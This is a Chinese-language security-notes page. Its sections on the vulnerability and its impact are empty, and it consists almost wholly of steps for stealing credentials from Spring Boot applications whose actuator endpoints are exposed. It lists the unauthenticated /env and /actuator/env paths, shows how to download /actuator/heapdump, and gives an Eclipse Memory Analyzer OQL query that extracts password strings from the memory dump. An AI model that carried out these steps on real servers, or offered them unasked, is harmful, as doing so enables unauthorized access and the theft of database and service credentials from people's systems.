menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Spring Boot 提取内存密码 chevron_right Spring Boot 提取内存密码.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Spring Boot 提取内存密码.md
    987 B / 2021-07-15 20:04:04
        Spring Boot 提取内存密码
========================

一、漏洞简介
------------

二、漏洞影响
------------

三、复现过程
------------

> 访问如下路径如果有数据说明存在漏洞

**Spring Boot 1.x版本**`http://www.0-sec.org:8090/env`

**Spring Boot 2.x版本**`http://www.0-sec.org:8090/actuator/env`![2.png](./resource/SpringBoot提取内存密码/media/rId24.png)

> 当发现存在未授权漏洞时,可以直接访问 `/actuator/heapdump`
> 下载内存,提取密码

`http://www.0-sec.org:8090/actuator/heapdump`

> heapdump文件下载完成之后可以利用Eclipse Memory Analyzer 来解析内存文件

    http://www.eclipse.org/mat/downloads.php

> 匹配内存中password字符串,并不一定能匹配完,可以通过`/actuator/env`得到的`JDBC`信息再来匹配关键字

`select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))`

![1.png](./resource/SpringBoot提取内存密码/media/rId25.png)
    links
    file_download